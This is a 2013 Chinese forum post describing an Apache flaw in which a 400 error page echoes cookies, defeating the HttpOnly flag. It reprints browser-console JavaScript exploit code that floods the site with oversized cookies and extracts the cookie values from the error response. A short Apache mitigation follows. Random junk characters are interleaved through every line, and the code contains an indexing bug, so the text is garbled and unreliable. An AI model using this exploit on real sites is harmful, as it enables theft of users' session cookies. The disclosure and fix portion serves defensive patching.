很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。+ x0 z9 }6 ]7 w
" Y- v6 o5 T w1 @' J6 I+ y8 q( ~用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
$ ?$ l9 J+ O+ k
- C) r6 R0 j. [$ R* q1 K/ ^0 j y9 {, z* K7 {) s
// http://www.exploit-db.com/exploits/18442/3 I+ i, }; D0 ?! e! R- _; A9 B/ V
function setCookies (good) {7 X% Y1 g& g7 |2 N3 d2 m$ d y! [3 C
// Construct string for cookie value
2 S( Z. i% }9 j) i3 yvar str = "";# I: s* K+ b( r0 M* v7 P
for (var i=0; i< 819; i++) {9 o9 ?' K' J. X1 L- U6 v" l
str += "x";. N& }6 U3 M) \6 g
}
$ s, v# p+ Z: f8 C+ \// Set cookies
5 d4 F1 A @ O& i! A8 d dfor (i = 0; i < 10; i++) {
* e' y6 X$ k0 ?4 P3 l// Expire evil cookie
& z% m c9 O% k" b/ Mif (good) {" c W; |) _; d
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
0 l6 _" [: R! ^0 t4 y6 ^3 V1 A2 c}; t _/ ^2 R, D' u( }& D, o
// Set evil cookie
5 {& ?$ E5 ~0 f% K' qelse {
; j# y* b; O7 Gvar cookie = "xss"+i+"="+str+";path=/";) H' M- u+ V9 n, H* G
}* I& H% |2 @3 A, a. a. \" @( @
document.cookie = cookie;6 `0 ]5 a; m: z% P/ l: b
}' T6 u0 A: U, q1 {* L8 ]% u
}
/ n$ G0 F# L7 h8 ^+ @0 V( Ufunction makeRequest() {
4 ~( ^# s& R2 k0 Q0 Y5 N/ dsetCookies();6 ]3 K) A8 V O6 g/ d" c" g
function parseCookies () {
- ~& G: I% B+ ?7 U9 Wvar cookie_dict = {};/ k9 x& ?+ |' {+ N- z2 q) O h/ w- C
// Only react on 400 status
! ^9 i* e' T$ J5 @: ~9 n1 e2 vif (xhr.readyState === 4 && xhr.status === 400) {! v; I. k+ z' k; y$ c8 @5 r5 `
// Replace newlines and match <pre> content1 i9 t0 U- Z2 x' ^8 V) r6 ~
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);) N: X' d% L6 V6 C4 {
if (content.length) {0 D7 b U+ S( ~2 ^) Y
// Remove Cookie: prefix4 \# \& L. `3 @% y' o
content = content[1].replace("Cookie: ", "");. h V z% h5 s: N9 C: c
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
' y; f1 D4 b$ Q# {2 w& d// Add cookies to object$ Y0 C8 v1 ^/ v4 r9 o. b" l
for (var i=0; i<cookies.length; i++) {, @3 g3 M' i% {9 V+ l
var s_c = cookies.split('=',2);
" b! O& K, e+ J2 B l0 Z' xcookie_dict[s_c[0]] = s_c[1];
7 {. q3 j/ M, z5 v! y$ K' `+ R}! a' X0 D% q* V; I$ s3 ?% }
}
3 v; N F) j$ e0 o$ y1 k// Unset malicious cookies
) A% }) k- G, w1 |8 DsetCookies(true);
7 _( K* _0 z3 A1 W# B3 s# lalert(JSON.stringify(cookie_dict));$ D; m( E1 j: Z. Y) x. D: ]8 X
}4 v/ r7 s) I5 Z
}
2 g; j) N3 Y2 g! G" E// Make XHR request+ E5 J1 j8 n/ F! Q3 [
var xhr = new XMLHttpRequest();1 m* N8 ]4 q; `' f
xhr.onreadystatechange = parseCookies;4 T( ^- ^/ S+ R# f: N5 i6 q0 o
xhr.open("GET", "/", true);" Q" H5 u% r$ d# t' U/ z; |; d
xhr.send(null);
) s; `9 \5 G2 b1 d' j}
1 u+ P. k' ?$ c/ Y6 y) wmakeRequest();' Q9 a! V5 g0 `
0 V! }3 I+ X' a" B4 ?
你就能看见华丽丽的400错误包含着cookie信息。
" m3 r+ Q7 T. m6 q8 s, R# n! n6 S. n7 {3 y/ V6 [+ q1 M9 m
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#/ m: y7 ?! y; L" H
/ I/ e: L# r9 _6 Z- J
修复方案:
& W0 Q7 t, F( t4 }2 M0 [! B+ M/ I2 M8 V3 A7 F4 {; K
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下$ u2 m0 t, t5 Q b1 z% d
: ^1 P0 e$ J: O& G( e# ZIn the event of a problem or error, Apachecan be configured to do one of four things,
1 F. Q/ F3 |# U3 ~+ k( @* l8 f! X5 w1 `5 `! z
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息8 G9 `& E$ y8 z/ P* U$ x2 Z
2. output acustomized message输出一段信息! y% r; A% F) s5 s+ [& [2 W3 p
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 1 l5 i& r; \6 V" ^/ x" O- W
4. redirect to an external URL to handle theproblem/error转向一个外部URL
* ]/ B* `8 E& r/ F; Q+ J0 A9 o% v, B2 L, [& ^6 H* e
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容, W2 Q$ ^+ K+ L$ j% f8 o
: R* Q' a6 i0 ^" L
Apache配置:% k, Z. _/ n/ c6 K, ^# ^9 I
0 A+ e2 k9 _6 P$ F
ErrorDocument400 " security test"
% }- G8 `* p1 F+ K5 G# M0 R/ k! u5 ^9 m Y- s
当然,升级apache到最新也可:)。6 n$ s4 ~# X7 c+ U# [# U3 @1 g
2 x, ?& b& D+ | R3 g" l
参考:http://httpd.apache.org/security/vulnerabilities_22.html
9 v# M2 T( N! G# O! Z! Q- ~+ r7 Y- O" v+ k, C& _& e* ^1 M
|
发表于 2013-4-19 19:15:43
收藏
支持
反对